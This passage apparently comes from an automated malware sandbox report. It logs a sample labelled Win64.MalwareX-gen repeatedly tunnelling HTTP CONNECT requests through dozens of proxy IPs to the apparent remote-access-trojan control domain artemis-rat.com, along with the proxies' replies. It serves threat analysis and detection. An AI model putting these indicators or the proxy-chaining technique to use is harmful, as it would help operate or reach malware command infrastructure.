76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.54 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              490192.168.2.450734139.162.238.184396527284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.092742920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.163239956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257381916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.257256985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.290986061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:55.303685904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:07.334960938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:31.334968090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:19.334985018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              491192.168.2.451450103.166.141.74200747284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.105325937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.488526106 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              492192.168.2.450690196.1.95.124807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.105742931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.256932974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257530928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.366739035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.366509914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:55.366405010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:07.381865978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:31.381854057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              493192.168.2.451421113.143.37.8290027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.107155085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              494192.168.2.451349103.86.109.38807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.111351013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              495192.168.2.45074837.187.77.58197677284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.117497921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.163271904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257380009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.257206917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.291054964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              496192.168.2.45085992.204.134.3815557284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.130436897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.616197109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.263629913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.422950029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              497192.168.2.450725104.248.158.78472257284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.130635977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.163275003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257386923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.257183075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.291064024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:55.306488037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:07.334974051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:31.334984064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:19.335004091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              498192.168.2.45143293.90.212.241537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.134999990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              499192.168.2.451566146.19.106.191123347284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.136604071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              500192.168.2.451246117.160.250.133807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.141541004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.672705889 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              501192.168.2.45146180.92.227.18556787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.145447016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              502192.168.2.45143913.234.24.11631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.151247025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.539875984 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              503192.168.2.45086972.195.34.4141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.155127048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              504192.168.2.45155372.210.208.10141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.156776905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              505192.168.2.45155468.1.210.16341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.157934904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              506192.168.2.450802185.132.242.21280837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.159665108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              507192.168.2.45155572.195.34.4241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.159882069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              508192.168.2.45155670.166.167.38577287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.160866022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              509192.168.2.4508128.142.3.14533067284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.167078972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              510192.168.2.45158523.19.244.10910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.176531076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              511192.168.2.451486216.9.224.113807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.177800894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              512192.168.2.451519222.255.238.159807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.179667950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.509134054 CET481INHTTP/1.1 302 Found
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Location: https://ktxcomay.com.vn
                                              Content-Length: 289
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              513192.168.2.45145238.54.116.931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.184945107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.602776051 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              514192.168.2.451586154.16.116.16625127284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.187436104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              515192.168.2.451476202.162.219.1010807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.188985109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
